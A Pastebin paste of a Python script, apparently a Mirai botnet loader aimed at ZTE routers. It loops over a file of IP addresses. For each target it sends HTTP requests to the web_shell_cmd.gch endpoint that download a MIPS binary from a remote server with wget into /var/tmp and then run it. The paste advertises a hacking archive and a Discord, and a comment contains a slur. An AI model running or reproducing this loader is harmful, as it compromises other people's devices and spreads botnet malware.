Advertisement
xB4ckdoorREAL

[ZTE V2 LOADER + LST][PYTHON][MIRAI EXPLOIT]

Apr 21st, 2019
1,437
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.65 KB | None | 0 0
  1. #B4CKDOORARCHIVE.HOST JOIN MY FREE HUGE ARCHIVE AND MY DISCORD.
  2.  
  3. import threading
  4. import socket
  5. import ssl
  6. import time
  7. import sys
  8. #downloaded by b4ckdoorarchive.host,
  9. server = "B4.CK.DO.OR"    
  10. mip = "b4ckdoorarchive.mips"
  11. bin1 = "" #Leave blank for no bin
  12.  
  13.  
  14. info = open(str(sys.argv[1]),'a+')
  15.  
  16. class skid(threading.Thread):
  17.     def __init__(self, ip):
  18.         threading.Thread.__init__(self)
  19.         self.ip = str(ip).rstrip('\n')
  20.     def run(self):
  21.         try:
  22.             f1 = "POST /web_shell_cmd.gch HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: HaxerMen\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: 114\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nIF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=cp+%2Fetc%2Finit.norm+%2Fvar%2Ftmp&CmdAck=\r\n\r\n"
  23.             s1 = "POST /web_shell_cmd.gch HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: HaxerMen\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: 154\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nIF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=wget+http%3A%2F%2F"+server+"%2F"+bin1+"%2F"+mip+"+-O+%2Fvar%2Ftmp%2Finit.norm&CmdAck=\r\n\r\n"
  24.             t1 = "POST /web_shell_cmd.gch HTTP/1.1\r\nHost: 127.0.0.1\r\nUser-Agent: HaxerMen\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nConnection: keep-alive\r\nContent-Length: 104\r\nContent-Type: application/x-www-form-urlencoded\r\n\r\nIF_ACTION=apply&IF_ERRORSTR=SUCC&IF_ERRORPARAM=SUCC&IF_ERRORTYPE=-1&Cmd=%2Fvar%2Ftmp%2Finit.norm&CmdAck=\r\n\r\n"
  25.  
  26.             sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  27.             ssl_sock = ssl.wrap_socket(sock)
  28.             ssl_sock.connect((self.ip, 443))
  29.  
  30.             ssl_sock.sendall(f1.encode('utf-8'))
  31.             ssl_sock.close()
  32.             time.sleep(3)
  33.  
  34.             sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  35.             ssl_sock = ssl.wrap_socket(sock)
  36.             ssl_sock.connect((self.ip, 443))
  37.  
  38.             ssl_sock.sendall(s1.encode('utf-8'))
  39.             ssl_sock.close()
  40.             time.sleep(5)
  41.  
  42.             sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  43.             ssl_sock = ssl.wrap_socket(sock)
  44.             ssl_sock.connect((self.ip, 443))
  45.  
  46.            
  47.             ssl_sock.sendall(t1.encode('utf-8'))
  48.             ssl_sock.close()
  49.             time.sleep(3)
  50.             print("[B4CKDOOR]" + self.ip)
  51.         except Exception as e:
  52.             print(e)
  53.             return#b4ckdoorwasherefaggot
  54.  
  55.  
  56.  
  57. for ip in info:
  58.     try:
  59.         time.sleep(0.01)
  60.         skid(ip).start()
  61.     except:
  62.         pass
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement